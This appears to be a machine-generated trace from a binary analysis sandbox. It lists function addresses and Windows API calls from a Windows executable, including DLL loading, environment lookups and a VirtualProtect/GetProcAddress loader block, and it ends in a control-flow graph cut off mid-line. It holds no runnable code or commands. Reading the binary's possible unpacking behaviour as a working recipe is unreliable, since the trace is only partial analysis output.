API calls 2 library calls 70496->70542 70497 7ff710f667cc 70497->70496 70540 7ff710f54f78 11 API calls _get_daylight 70497->70540 70500->70497 70538 7ff710f54f78 11 API calls _get_daylight 70500->70538 70501->70448 70501->70449 70502 7ff710f66876 70502->70501 70505 7ff710f668f8 70502->70505 70503 7ff710f66812 70541 7ff710f5a950 37 API calls _invalid_parameter_noinfo 70503->70541 70543 7ff710f5a970 17 API calls _isindst 70505->70543 70507 7ff710f667c1 70539 7ff710f5a950 37 API calls _invalid_parameter_noinfo 70507->70539 70544 7ff710f60348 EnterCriticalSection 70511->70544 70523->70468 70524->70460 70536->70494 70537->70500 70538->70507 70539->70497 70540->70503 70541->70496 70542->70502 70546 7ff710f5053e 70545->70546 70547 7ff710f504fe 70545->70547 70546->70547 70549 7ff710f5054a 70546->70549 70557 7ff710f5a884 37 API calls 2 library calls 70547->70557 70556 7ff710f554dc EnterCriticalSection 70549->70556 70550 7ff710f50525 70550->70335 70552 7ff710f5054f 70553 7ff710f50658 71 API calls 70552->70553 70554 7ff710f50561 70553->70554 70555 7ff710f554e8 _fread_nolock LeaveCriticalSection 70554->70555 70555->70550 70557->70550 70559 7ff710f50b7c 70558->70559 70568 7ff710f5089c 70559->70568 70561 7ff710f50b9a 70561->70356 70562->70341 70563->70345 70564->70352 70565->70349 70566->70352 70567->70352 70569 7ff710f508bc 70568->70569 70570 7ff710f508e9 70568->70570 70569->70570 70571 7ff710f508c6 70569->70571 70572 7ff710f508f1 70569->70572 70570->70561 70582 7ff710f5a884 37 API calls 2 library calls 70571->70582 70575 7ff710f507dc 70572->70575 70583 7ff710f554dc EnterCriticalSection 70575->70583 70577 7ff710f507f9 70578 7ff710f5081c 74 API calls 70577->70578 70579 7ff710f50802 70578->70579 70580 7ff710f554e8 _fread_nolock LeaveCriticalSection 70579->70580 70581 7ff710f5080d 70580->70581 70581->70570 70582->70570 70585 7ff710f4feb3 70584->70585 70586 7ff710f4fee1 70584->70586 70595 7ff710f5a884 37 API calls 2 library calls 70585->70595 70588 7ff710f4fed3 70586->70588 70594 7ff710f554dc EnterCriticalSection 70586->70594 70588->70361 70590 7ff710f4fef8 70591 7ff710f4ff14 72 API calls 70590->70591 70592 7ff710f4ff04 70591->70592 70593 7ff710f554e8 _fread_nolock LeaveCriticalSection 70592->70593 70593->70588 70595->70588 70597 7ff710f50456 70596->70597 70608 7ff710f50424 70596->70608 70598 7ff710f50465 __scrt_get_show_window_mode 70597->70598 70599 7ff710f504a2 70597->70599 70597->70608 70610 7ff710f54f78 11 API calls _get_daylight 70598->70610 70609 7ff710f554dc EnterCriticalSection 70599->70609 70601 7ff710f504aa 70603 7ff710f501ac _fread_nolock 51 API calls 70601->70603 70605 7ff710f504c1 70603->70605 70604 7ff710f5047a 70611 7ff710f5a950 37 API calls _invalid_parameter_noinfo 70604->70611 70607 7ff710f554e8 _fread_nolock LeaveCriticalSection 70605->70607 70607->70608 70608->70292 70610->70604 70611->70608 70613 7ff710f54a4e 70612->70613 70614 7ff710f54a73 70613->70614 70616 7ff710f54aaf 70613->70616 70630 7ff710f5a884 37 API calls 2 library calls 70614->70630 70631 7ff710f52c80 49 API calls _invalid_parameter_noinfo 70616->70631 70618 7ff710f54a9d 70621 7ff710f4c5c0 _log10_special 8 API calls 70618->70621 70619 7ff710f54b8c 70634 7ff710f5a9b8 11 API calls 2 library calls 70619->70634 70622 7ff710f41cc8 70621->70622 70622->70257 70623 7ff710f54b46 70623->70619 70624 7ff710f54bb0 70623->70624 70625 7ff710f54b61 70623->70625 70627 7ff710f54b58 70623->70627 70624->70619 70628 7ff710f54bba 70624->70628 70632 7ff710f5a9b8 11 API calls 2 library calls 70625->70632 70627->70619 70627->70625 70633 7ff710f5a9b8 11 API calls 2 library calls 70628->70633 70630->70618 70631->70623 70632->70618 70633->70618 70634->70618 70635->70312 70637 7ff8a92d1a0f 70638 7ff8a931ab70 70637->70638 70639 7ff8a931b8e1 00007FF8C6126570 70638->70639 70644 7ff8a931ace7 70638->70644 70640 7ff8a931b906 00007FF8C6126570 70639->70640 70639->70644 70641 7ff8a931b926 00007FF8C6126570 70640->70641 70640->70644 70642 7ff8a931b93d 00007FF8C6126570 70641->70642 70641->70644 70643 7ff8a931b957 00007FF8C6126570 70642->70643 70642->70644 70643->70644 70645 7ff8a8761240 GetSystemInfo 70646 7ff8a8761274 70645->70646 70647 7ff710f4ccac 70668 7ff710f4ce7c 70647->70668 70650 7ff710f4cdf8 70817 7ff710f4d19c 7 API calls 2 library calls 70650->70817 70651 7ff710f4ccc8 __scrt_acquire_startup_lock 70653 7ff710f4ce02 70651->70653 70660 7ff710f4cce6 __scrt_release_startup_lock 70651->70660 70818 7ff710f4d19c 7 API calls 2 library calls 70653->70818 70655 7ff710f4cd0b 70656 7ff710f4ce0d __CxxCallCatchBlock 70657 7ff710f4cd91 70674 7ff710f4d2e4 70657->70674 70659 7ff710f4cd96 70677 7ff710f41000 70659->70677 70660->70655 70660->70657 70814 7ff710f59b9c 45 API calls 70660->70814 70666 7ff710f4cdb9 70666->70656 70816 7ff710f4d000 7 API calls 70666->70816 70667 7ff710f4cdd0 70667->70655 70669 7ff710f4ce84 70668->70669 70670 7ff710f4ce90 __scrt_dllmain_crt_thread_attach 70669->70670 70671 7ff710f4ccc0 70670->70671 70672 7ff710f4ce9d 70670->70672 70671->70650 70671->70651 70672->70671 70819 7ff710f4d8f8 7 API calls 2 library calls 70672->70819 70820 7ff710f6a540 70674->70820 70676 7ff710f4d2fb GetStartupInfoW 70676->70659 70678 7ff710f41009 70677->70678 70822 7ff710f554f4 70678->70822 70680 7ff710f437fb 70829 7ff710f436b0 70680->70829 70684 7ff710f4c5c0 _log10_special 8 API calls 70686 7ff710f43ca7 70684->70686 70815 7ff710f4d328 GetModuleHandleW 70686->70815 70687 7ff710f4383c 70690 7ff710f41c80 49 API calls 70687->70690 70688 7ff710f4391b 70689 7ff710f445b0 108 API calls 70688->70689 70691 7ff710f4392b 70689->70691 70692 7ff710f4385b 70690->70692 70693 7ff710f4396a 70691->70693 70924 7ff710f47f80 70691->70924 70901 7ff710f48a20 70692->70901 70933 7ff710f42710 54 API calls _log10_special 70693->70933 70697 7ff710f4388e 70704 7ff710f438bb __vcrt_freefls 70697->70704 70923 7ff710f48b90 40 API calls __vcrt_freefls 70697->70923 70698 7ff710f4395d 70699 7ff710f43962 70698->70699 70700 7ff710f43984 70698->70700 70702 7ff710f500bc 74 API calls 70699->70702 70703 7ff710f41c80 49 API calls 70700->70703 70702->70693 70705 7ff710f439a3 70703->70705 70707 7ff710f48a20 14 API calls 70704->70707 70715 7ff710f438de __vcrt_freefls 70704->70715 70709 7ff710f41950 115 API calls 70705->70709 70707->70715 70708 7ff710f43a0b 70936 7ff710f48b90 40 API calls __vcrt_freefls 70708->70936 70711 7ff710f439ce 70709->70711 70711->70692 70713 7ff710f439de 70711->70713 70712 7ff710f43a17 70937 7ff710f48b90 40 API calls __vcrt_freefls 70712->70937 70934 7ff710f42710 54 API calls _log10_special 70713->70934 70719 7ff710f4390e __vcrt_freefls 70715->70719 70935 7ff710f48b30 40 API calls __vcrt_freefls 70715->70935 70717 7ff710f43a23 70938 7ff710f48b90 40 API calls __vcrt_freefls 70717->70938 70720 7ff710f48a20 14 API calls 70719->70720 70721 7ff710f43a3b 70720->70721 70722 7ff710f43b2f 70721->70722 70723 7ff710f43a60 __vcrt_freefls 70721->70723 70940 7ff710f42710 54 API calls _log10_special 70722->70940 70734 7ff710f43aab 70723->70734 70939 7ff710f48b30 40 API calls __vcrt_freefls 70723->70939 70725 7ff710f43808 __vcrt_freefls 70725->70684 70727 7ff710f48a20 14 API calls 70728 7ff710f43bf4 __vcrt_freefls 70727->70728 70729 7ff710f43d41 70728->70729 70730 7ff710f43c46 70728->70730 70945 7ff710f444d0 49 API calls 70729->70945 70731 7ff710f43c50 70730->70731 70732 7ff710f43cd4 70730->70732 70941 7ff710f490e0 59 API calls _log10_special 70731->70941 70737 7ff710f48a20 14 API calls 70732->70737 70734->70727 70736 7ff710f43d4f 70740 7ff710f43d71 70736->70740 70741 7ff710f43d65 70736->70741 70738 7ff710f43ce0 70737->70738 70743 7ff710f43c61 70738->70743 70747 7ff710f43ced 70738->70747 70739 7ff710f43c55 70739->70743 70744 7ff710f43cb3 70739->70744 70742 7ff710f41c80 49 API calls 70740->70742 70946 7ff710f44620 70741->70946 70756 7ff710f43d2b __vcrt_freefls 70742->70756 70942 7ff710f42710 54 API calls _log10_special 70743->70942 70943 7ff710f48850 86 API calls 2 library calls 70744->70943 70751 7ff710f41c80 49 API calls 70747->70751 70748 7ff710f43dc4 70754 7ff710f49400 2 API calls 70748->70754 70749 7ff710f43cbb 70752 7ff710f43cc8 70749->70752 70753 7ff710f43cbf 70749->70753 70755 7ff710f43d0b 70751->70755 70752->70756 70753->70743 70759 7ff710f43dd7 SetDllDirectoryW 70754->70759 70755->70756 70757 7ff710f43d12 70755->70757 70756->70748 70758 7ff710f43da7 SetDllDirectoryW LoadLibraryExW 70756->70758 70944 7ff710f42710 54 API calls _log10_special 70757->70944 70758->70748 70762 7ff710f43e0a 70759->70762 70804 7ff710f43e5a 70759->70804 70764 7ff710f48a20 14 API calls 70762->70764 70763 7ff710f43ffc 70766 7ff710f44029 70763->70766 70767 7ff710f44006 PostMessageW GetMessageW 70763->70767 70770 7ff710f43e16 __vcrt_freefls 70764->70770 70765 7ff710f43f1b 70957 7ff710f433c0 121 API calls 2 library calls 70765->70957 70914 7ff710f43360 70766->70914 70767->70766 70769 7ff710f43f23 70769->70725 70771 7ff710f43f2b 70769->70771 70773 7ff710f43ef2 70770->70773 70776 7ff710f43e4e 70770->70776 70958 7ff710f490c0 LocalFree 70771->70958 70956 7ff710f48b30 40 API calls __vcrt_freefls 70773->70956 70776->70804 70949 7ff710f46db0 54 API calls _get_daylight 70776->70949 70782 7ff710f44043 70960 7ff710f46fb0 FreeLibrary 70782->70960 70785 7ff710f4404f 70789 7ff710f43e6c 70950 7ff710f47330 117 API calls 2 library calls 70789->70950 70793 7ff710f43e81 70795 7ff710f43ea2 70793->70795 70807 7ff710f43e85 70793->70807 70951 7ff710f46df0 120 API calls _log10_special 70793->70951 70795->70807 70952 7ff710f471a0 125 API calls 70795->70952 70800 7ff710f43eb7 70800->70807 70953 7ff710f474e0 55 API calls 70800->70953 70801 7ff710f43ee0 70955 7ff710f46fb0 FreeLibrary 70801->70955 70804->70763 70804->70765 70807->70804 70954 7ff710f42a50 54 API calls _log10_special 70807->70954 70814->70657 70815->70666 70816->70667 70817->70653 70818->70656 70819->70671 70821 7ff710f6a530 70820->70821 70821->70676 70821->70821 70825 7ff710f5f4f0 70822->70825 70823 7ff710f5f543 70961 7ff710f5a884 37 API calls 2 library calls 70823->70961 70825->70823 70826 7ff710f5f596 70825->70826 70962 7ff710f5f3c8 71 API calls _fread_nolock 70826->70962 70828 7ff710f5f56c 70828->70680 70963 7ff710f4c8c0 70829->70963 70832 7ff710f436eb GetLastError 70970 7ff710f42c50 51 API calls _log10_special 70832->70970 70833 7ff710f43710 70965 7ff710f492f0 FindFirstFileExW 70833->70965 70837 7ff710f4377d 70973 7ff710f494b0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 70837->70973 70838 7ff710f43723 70971 7ff710f49370 CreateFileW GetFinalPathNameByHandleW CloseHandle 70838->70971 70840 7ff710f4c5c0 _log10_special 8 API calls 70843 7ff710f437b5 70840->70843 70842 7ff710f43730 70845 7ff710f43734 70842->70845 70849 7ff710f4374c __vcrt_InitializeCriticalSectionEx 70842->70849 70843->70725 70851 7ff710f41950 70843->70851 70844 7ff710f4378b 70850 7ff710f43706 70844->70850 70974 7ff710f42810 49 API calls _log10_special 70844->70974 70972 7ff710f42810 49 API calls _log10_special 70845->70972 70848 7ff710f43745 70848->70850 70849->70837 70850->70840 70852 7ff710f445b0 108 API calls 70851->70852 70853 7ff710f41985 70852->70853 70854 7ff710f41c43 70853->70854 70855 7ff710f47f80 83 API calls 70853->70855 70856 7ff710f4c5c0 _log10_special 8 API calls 70854->70856 70857 7ff710f419cb 70855->70857 70858 7ff710f41c5e 70856->70858 70859 7ff710f50744 73 API calls 70857->70859 70900 7ff710f41a03 70857->70900 70858->70687 70858->70688 70861 7ff710f419e5 70859->70861 70860 7ff710f500bc 74 API calls 70860->70854 70862 7ff710f419e9 70861->70862 70863 7ff710f41a08 70861->70863 70975 7ff710f54f78 11 API calls _get_daylight 70862->70975 70864 7ff710f5040c _fread_nolock 53 API calls 70863->70864 70866 7ff710f41a20 70864->70866 70868 7ff710f41a26 70866->70868 70869 7ff710f41a45 70866->70869 70867 7ff710f419ee 70976 7ff710f42910 54 API calls _log10_special 70867->70976 70977 7ff710f54f78 11 API calls _get_daylight 70868->70977 70874 7ff710f41a5c 70869->70874 70875 7ff710f41a7b 70869->70875 70872 7ff710f41a2b 70978 7ff710f42910 54 API calls _log10_special 70872->70978 70979 7ff710f54f78 11 API calls _get_daylight 70874->70979 70876 7ff710f41c80 49 API calls 70875->70876 70878 7ff710f41a92 70876->70878 70880 7ff710f41c80 49 API calls 70878->70880 70879 7ff710f41a61 70980 7ff710f42910 54 API calls _log10_special 70879->70980 70882 7ff710f41add 70880->70882 70883 7ff710f50744 73 API calls 70882->70883 70884 7ff710f41b01 70883->70884 70885 7ff710f41b16 70884->70885 70886 7ff710f41b35 70884->70886 70981 7ff710f54f78 11 API calls _get_daylight 70885->70981 70888 7ff710f5040c _fread_nolock 53 API calls 70886->70888 70889 7ff710f41b4a 70888->70889 70891 7ff710f41b50 70889->70891 70892 7ff710f41b6f 70889->70892 70890 7ff710f41b1b 70982 7ff710f42910 54 API calls _log10_special 70890->70982 70983 7ff710f54f78 11 API calls _get_daylight 70891->70983 70985 7ff710f50180 37 API calls 2 library calls 70892->70985 70896 7ff710f41b55 70984 7ff710f42910 54 API calls _log10_special 70896->70984 70897 7ff710f41b89 70897->70900 70986 7ff710f42710 54 API calls _log10_special 70897->70986 70900->70860 70902 7ff710f48a2a 70901->70902 70903 7ff710f49400 2 API calls 70902->70903 70904 7ff710f48a49 GetEnvironmentVariableW 70903->70904 70905 7ff710f48a66 ExpandEnvironmentStringsW 70904->70905 70906 7ff710f48ab2 70904->70906 70905->70906 70907 7ff710f48a88 70905->70907 70908 7ff710f4c5c0 _log10_special 8 API calls 70906->70908 70987 7ff710f494b0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 70907->70987 70910 7ff710f48ac4 70908->70910 70910->70697 70911 7ff710f48a9a 70912 7ff710f4c5c0 _log10_special 8 API calls 70911->70912 70913 7ff710f48aaa 70912->70913 70913->70697 70988 7ff710f46350 70914->70988 70918 7ff710f43381 70922 7ff710f43399 70918->70922 71056 7ff710f46040 70918->71056 70920 7ff710f4338d 70920->70922 71065 7ff710f461d0 54 API calls 70920->71065 70959 7ff710f43670 FreeLibrary 70922->70959 70923->70704 70925 7ff710f47fa4 70924->70925 70926 7ff710f4807b __vcrt_freefls 70925->70926 70927 7ff710f50744 73 API calls 70925->70927 70926->70698 70928 7ff710f47fc0 70927->70928 70928->70926 71119 7ff710f57938 70928->71119 70930 7ff710f47fd5 70930->70926 70931 7ff710f50744 73 API calls 70930->70931 70932 7ff710f5040c _fread_nolock 53 API calls 70930->70932 70931->70930 70932->70930 70933->70725 70934->70725 70935->70708 70936->70712 70937->70717 70938->70719 70939->70734 70940->70725 70941->70739 70942->70725 70943->70749 70944->70725 70945->70736 70947 7ff710f41c80 49 API calls 70946->70947 70948 7ff710f44650 70947->70948 70948->70756 70949->70789 70950->70793 70951->70795 70952->70800 70953->70807 70954->70801 70955->70804 70956->70804 70957->70769 70959->70782 70960->70785 70961->70828 70962->70828 70964 7ff710f436bc GetModuleFileNameW 70963->70964 70964->70832 70964->70833 70966 7ff710f4932f FindClose 70965->70966 70967 7ff710f49342 70965->70967 70966->70967 70968 7ff710f4c5c0 _log10_special 8 API calls 70967->70968 70969 7ff710f4371a 70968->70969 70969->70837 70969->70838 70970->70850 70971->70842 70972->70848 70973->70844 70974->70850 70975->70867 70976->70900 70977->70872 70978->70900 70979->70879 70980->70900 70981->70890 70982->70900 70983->70896 70984->70900 70985->70897 70986->70900 70987->70911 70989 7ff710f46365 70988->70989 70990 7ff710f41c80 49 API calls 70989->70990 70991 7ff710f463a1 70990->70991 70992 7ff710f463aa 70991->70992 70993 7ff710f463cd 70991->70993 71076 7ff710f42710 54 API calls _log10_special 70992->71076 70995 7ff710f44620 49 API calls 70993->70995 70996 7ff710f463e5 70995->70996 70997 7ff710f46403 70996->70997 71077 7ff710f42710 54 API calls _log10_special 70996->71077 71066 7ff710f44550 70997->71066 70998 7ff710f4c5c0 _log10_special 8 API calls 71001 7ff710f4336e 70998->71001 71001->70922 71019 7ff710f464f0 71001->71019 71002 7ff710f4641b 71005 7ff710f44620 49 API calls 71002->71005 71004 7ff710f49070 3 API calls 71004->71002 71006 7ff710f46434 71005->71006 71007 7ff710f46459 71006->71007 71008 7ff710f46439 71006->71008 71072 7ff710f49070 71007->71072 71078 7ff710f42710 54 API calls _log10_special 71008->71078 71011 7ff710f463c3 71011->70998 71012 7ff710f46466 71013 7ff710f46472 71012->71013 71014 7ff710f464b1 71012->71014 71016 7ff710f49400 2 API calls 71013->71016 71080 7ff710f45820 137 API calls 71014->71080 71017 7ff710f4648a GetLastError 71016->71017 71079 7ff710f42c50 51 API calls _log10_special 71017->71079 71081 7ff710f453f0 71019->71081 71021 7ff710f46516 71022 7ff710f4651e 71021->71022 71023 7ff710f4652f 71021->71023 71106 7ff710f42710 54 API calls _log10_special 71022->71106 71088 7ff710f44c80 71023->71088 71027 7ff710f4654c 71031 7ff710f4655c 71027->71031 71033 7ff710f4656d 71027->71033 71028 7ff710f4653b 71107 7ff710f42710 54 API calls _log10_special 71028->71107 71030 7ff710f4652a 71030->70918 71108 7ff710f42710 54 API calls _log10_special 71031->71108 71034 7ff710f4659d 71033->71034 71035 7ff710f4658c 71033->71035 71037 7ff710f465bd 71034->71037 71038 7ff710f465ac 71034->71038 71109 7ff710f42710 54 API calls _log10_special 71035->71109 71092 7ff710f44d40 71037->71092 71110 7ff710f42710 54 API calls _log10_special 71038->71110 71042 7ff710f465dd 71045 7ff710f465fd 71042->71045 71046 7ff710f465ec 71042->71046 71043 7ff710f465cc 71111 7ff710f42710 54 API calls _log10_special 71043->71111 71048 7ff710f4660f 71045->71048 71051 7ff710f46620 71045->71051 71112 7ff710f42710 54 API calls _log10_special 71046->71112 71113 7ff710f42710 54 API calls _log10_special 71048->71113 71049 7ff710f4664a 71049->71030 71116 7ff710f42710 54 API calls _log10_special 71049->71116 71051->71049 71114 7ff710f57320 73 API calls 71051->71114 71053 7ff710f46638 71115 7ff710f57320 73 API calls 71053->71115 71057 7ff710f46060 71056->71057 71057->71057 71058 7ff710f46089 71057->71058 71064 7ff710f460a0 __vcrt_freefls 71057->71064 71118 7ff710f42710 54 API calls _log10_special 71058->71118 71060 7ff710f46095 71060->70920 71061 7ff710f461ab 71061->70920 71062 7ff710f41470 116 API calls 71062->71064 71063 7ff710f42710 54 API calls 71063->71064 71064->71061 71064->71062 71064->71063 71065->70922 71067 7ff710f4455a 71066->71067 71068 7ff710f49400 2 API calls 71067->71068 71069 7ff710f4457f 71068->71069 71070 7ff710f4c5c0 _log10_special 8 API calls 71069->71070 71071 7ff710f445a7 71070->71071 71071->71002 71071->71004 71073 7ff710f49400 2 API calls 71072->71073 71074 7ff710f49084 LoadLibraryExW 71073->71074 71075 7ff710f490a3 __vcrt_freefls 71074->71075 71075->71012 71076->71011 71077->70997 71078->71011 71079->71011 71080->71011 71083 7ff710f4541c 71081->71083 71082 7ff710f45424 71082->71021 71083->71082 71086 7ff710f455c4 71083->71086 71117 7ff710f56b14 48 API calls 71083->71117 71084 7ff710f45787 __vcrt_freefls 71084->71021 71085 7ff710f447c0 47 API calls 71085->71086 71086->71084 71086->71085 71089 7ff710f44cb0 71088->71089 71090 7ff710f4c5c0 _log10_special 8 API calls 71089->71090 71091 7ff710f44d1a 71090->71091 71091->71027 71091->71028 71093 7ff710f44d55 71092->71093 71094 7ff710f41c80 49 API calls 71093->71094 71095 7ff710f44da1 71094->71095 71096 7ff710f44e23 __vcrt_freefls 71095->71096 71097 7ff710f41c80 49 API calls 71095->71097 71098 7ff710f4c5c0 _log10_special 8 API calls 71096->71098 71099 7ff710f44de0 71097->71099 71100 7ff710f44e6e 71098->71100 71099->71096 71101 7ff710f49400 2 API calls 71099->71101 71100->71042 71100->71043 71102 7ff710f44df6 71101->71102 71103 7ff710f49400 2 API calls 71102->71103 71104 7ff710f44e0d 71103->71104 71105 7ff710f49400 2 API calls 71104->71105 71105->71096 71106->71030 71107->71030 71108->71030 71109->71030 71110->71030 71111->71030 71112->71030 71113->71030 71114->71053 71115->71049 71116->71030 71117->71083 71118->71060 71120 7ff710f57968 71119->71120 71123 7ff710f57444 71120->71123 71122 7ff710f57981 71122->70930 71124 7ff710f5748e 71123->71124 71125 7ff710f5745f 71123->71125 71133 7ff710f554dc EnterCriticalSection 71124->71133 71134 7ff710f5a884 37 API calls 2 library calls 71125->71134 71128 7ff710f5747f 71128->71122 71129 7ff710f57493 71130 7ff710f574b0 38 API calls 71129->71130 71131 7ff710f5749f 71130->71131 71132 7ff710f554e8 _fread_nolock LeaveCriticalSection 71131->71132 71132->71128 71134->71128 71135 7ff8a92efd40 71136 7ff8a92efd50 71135->71136 71137 7ff8a92efd62 71136->71137 71140 7ff8a92d14bf 71136->71140 71144 7ff8a92d1df7 71136->71144 71140->71137 71141 7ff8a932e960 71140->71141 71142 7ff8a932f1c1 SetLastError 71141->71142 71143 7ff8a932f1d5 71141->71143 71142->71143 71143->71137 71144->71137 71145 7ff8a932eaa0 71144->71145 71146 7ff8a932f1c1 SetLastError 71145->71146 71147 7ff8a932f1d5 71145->71147 71146->71147 71147->71137 71148 7ff8a8200330 71149 7ff8a8200348 71148->71149 71155 7ff8a8200f10 71148->71155 71150 7ff8a8200e33 LoadLibraryA 71149->71150 71152 7ff8a8200e82 VirtualProtect VirtualProtect 71149->71152 71151 7ff8a8200e4d 71150->71151 71151->71149 71154 7ff8a8200e56 GetProcAddress 71151->71154 71152->71155 71154->71151 71156 7ff8a8200e77 71154->71156 71155->71155

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 7ff710f41000-7ff710f43806 call 7ff710f4fe88 call 7ff710f4fe90 call 7ff710f4c8c0 call 7ff710f55460 call 7ff710f554f4 call 7ff710f436b0 14 7ff710f43808-7ff710f4380f 0->14 15 7ff710f43814-7ff710f43836 call 7ff710f41950 0->15 16 7ff710f43c97-7ff710f43cb2 call 7ff710f4c5c0 14->16 21 7ff710f4383c-7ff710f43856 call 7ff710f41c80 15->21 22 7ff710f4391b-7ff710f43931 call 7ff710f445b0 15->22 26 7ff710f4385b-7ff710f4389b call 7ff710f48a20 21->26 27 7ff710f4396a-7ff710f4397f call 7ff710f42710 22->27 28 7ff710f43933-7ff710f43960 call 7ff710f47f80 22->28 35 7ff710f4389d-7ff710f438a3 26->35 36 7ff710f438c1-7ff710f438cc call 7ff710f54fa0 26->36 42 7ff710f43c8f 27->42 40 7ff710f43962-7ff710f43965 call 7ff710f500bc 28->40 41 7ff710f43984-7ff710f439a6 call 7ff710f41c80 28->41 37 7ff710f438af-7ff710f438bd call 7ff710f48b90 35->37 38 7ff710f438a5-7ff710f438ad 35->38 48 7ff710f439fc-7ff710f43a2a call 7ff710f48b30 call 7ff710f48b90 * 3 36->48 49 7ff710f438d2-7ff710f438e1 call 7ff710f48a20 36->49 37->36 38->37 40->27 53 7ff710f439b0-7ff710f439b9 41->53 42->16 75 7ff710f43a2f-7ff710f43a3e call 7ff710f48a20 48->75 59 7ff710f438e7-7ff710f438ed 49->59 60 7ff710f439f4-7ff710f439f7 call 7ff710f54fa0 49->60 53->53 54 7ff710f439bb-7ff710f439d8 call 7ff710f41950 53->54 54->26 65 7ff710f439de-7ff710f439ef call 7ff710f42710 54->65 63 7ff710f438f0-7ff710f438fc 59->63 60->48 67 7ff710f438fe-7ff710f43903 63->67 68 7ff710f43905-7ff710f43908 63->68 65->42 67->63 67->68 68->60 71 7ff710f4390e-7ff710f43916 call 7ff710f54fa0 68->71 71->75 79 7ff710f43b45-7ff710f43b53 75->79 80 7ff710f43a44-7ff710f43a47 75->80 82 7ff710f43b59-7ff710f43b5d 79->82 83 7ff710f43a67 79->83 80->79 81 7ff710f43a4d-7ff710f43a50 80->81 84 7ff710f43a56-7ff710f43a5a 81->84 85 7ff710f43b14-7ff710f43b17 81->85 86 7ff710f43a6b-7ff710f43a90 call 7ff710f54fa0 82->86 83->86 84->85 89 7ff710f43a60 84->89 87 7ff710f43b19-7ff710f43b1d 85->87 88 7ff710f43b2f-7ff710f43b40 call 7ff710f42710 85->88 95 7ff710f43aab-7ff710f43ac0 86->95 96 7ff710f43a92-7ff710f43aa6 call 7ff710f48b30 86->96 87->88 91 7ff710f43b1f-7ff710f43b2a 87->91 97 7ff710f43c7f-7ff710f43c87 88->97 89->83 91->86 99 7ff710f43be8-7ff710f43bfa call 7ff710f48a20 95->99 100 7ff710f43ac6-7ff710f43aca 95->100 96->95 97->42 108 7ff710f43c2e 99->108 109 7ff710f43bfc-7ff710f43c02 99->109 101 7ff710f43bcd-7ff710f43be2 call 7ff710f41940 100->101 102 7ff710f43ad0-7ff710f43ae8 call 7ff710f552c0 100->102 101->99 101->100 113 7ff710f43aea-7ff710f43b02 call 7ff710f552c0 102->113 114 7ff710f43b62-7ff710f43b7a call 7ff710f552c0 102->114 115 7ff710f43c31-7ff710f43c40 call 7ff710f54fa0 108->115 111 7ff710f43c1e-7ff710f43c2c 109->111 112 7ff710f43c04-7ff710f43c1c 109->112 111->115 112->115 113->101 124 7ff710f43b08-7ff710f43b0f 113->124 122 7ff710f43b87-7ff710f43b9f call 7ff710f552c0 114->122 123 7ff710f43b7c-7ff710f43b80 114->123 125 7ff710f43d41-7ff710f43d63 call 7ff710f444d0 115->125 126 7ff710f43c46-7ff710f43c4a 115->126 135 7ff710f43bac-7ff710f43bc4 call 7ff710f552c0 122->135 136 7ff710f43ba1-7ff710f43ba5 122->136 123->122 124->101 139 7ff710f43d71-7ff710f43d82 call 7ff710f41c80 125->139 140 7ff710f43d65-7ff710f43d6f call 7ff710f44620 125->140 128 7ff710f43c50-7ff710f43c5f call 7ff710f490e0 126->128 129 7ff710f43cd4-7ff710f43ce6 call 7ff710f48a20 126->129 143 7ff710f43c61 128->143 144 7ff710f43cb3-7ff710f43cbd call 7ff710f48850 128->144 146 7ff710f43ce8-7ff710f43ceb 129->146 147 7ff710f43d35-7ff710f43d3c 129->147 135->101 157 7ff710f43bc6 135->157 136->135 148 7ff710f43d87-7ff710f43d96 139->148 140->148 150 7ff710f43c68 call 7ff710f42710 143->150 161 7ff710f43cc8-7ff710f43ccf 144->161 162 7ff710f43cbf-7ff710f43cc6 144->162 146->147 152 7ff710f43ced-7ff710f43d10 call 7ff710f41c80 146->152 147->150 154 7ff710f43d98-7ff710f43d9f 148->154 155 7ff710f43dc4-7ff710f43dda call 7ff710f49400 148->155 165 7ff710f43c6d-7ff710f43c77 150->165 166 7ff710f43d2b-7ff710f43d33 call 7ff710f54fa0 152->166 167 7ff710f43d12-7ff710f43d26 call 7ff710f42710 call 7ff710f54fa0 152->167 154->155 160 7ff710f43da1-7ff710f43da5 154->160 172 7ff710f43de8-7ff710f43e04 SetDllDirectoryW 155->172 173 7ff710f43ddc 155->173 157->101 160->155 168 7ff710f43da7-7ff710f43dbe SetDllDirectoryW LoadLibraryExW 160->168 161->148 162->150 165->97 166->148 167->165 168->155 176 7ff710f43e0a-7ff710f43e19 call 7ff710f48a20 172->176 177 7ff710f43f01-7ff710f43f08 172->177 173->172 189 7ff710f43e1b-7ff710f43e21 176->189 190 7ff710f43e32-7ff710f43e3c call 7ff710f54fa0 176->190 179 7ff710f43f0e-7ff710f43f15 177->179 180 7ff710f43ffc-7ff710f44004 177->180 179->180 183 7ff710f43f1b-7ff710f43f25 call 7ff710f433c0 179->183 184 7ff710f44029-7ff710f44034 call 7ff710f436a0 call 7ff710f43360 180->184 185 7ff710f44006-7ff710f44023 PostMessageW GetMessageW 180->185 183->165 197 7ff710f43f2b-7ff710f43f3f call 7ff710f490c0 183->197 202 7ff710f44039-7ff710f4405b call 7ff710f43670 call 7ff710f46fb0 call 7ff710f46d60 184->202 185->184 194 7ff710f43e2d-7ff710f43e2f 189->194 195 7ff710f43e23-7ff710f43e2b 189->195 199 7ff710f43ef2-7ff710f43efc call 7ff710f48b30 190->199 200 7ff710f43e42-7ff710f43e48 190->200 194->190 195->194 209 7ff710f43f41-7ff710f43f5e PostMessageW GetMessageW 197->209 210 7ff710f43f64-7ff710f43fa7 call 7ff710f48b30 call 7ff710f48bd0 call 7ff710f46fb0 call 7ff710f46d60 call 7ff710f48ad0 197->210 199->177 200->199 203 7ff710f43e4e-7ff710f43e54 200->203 207 7ff710f43e5f-7ff710f43e61 203->207 208 7ff710f43e56-7ff710f43e58 203->208 207->177 214 7ff710f43e67-7ff710f43e83 call 7ff710f46db0 call 7ff710f47330 207->214 213 7ff710f43e5a 208->213 208->214 209->210 249 7ff710f43fe9-7ff710f43ff7 call 7ff710f41900 210->249 250 7ff710f43fa9-7ff710f43fb3 call 7ff710f49200 210->250 213->177 228 7ff710f43e8e-7ff710f43e95 214->228 229 7ff710f43e85-7ff710f43e8c 214->229 230 7ff710f43e97-7ff710f43ea4 call 7ff710f46df0 228->230 231 7ff710f43eaf-7ff710f43eb9 call 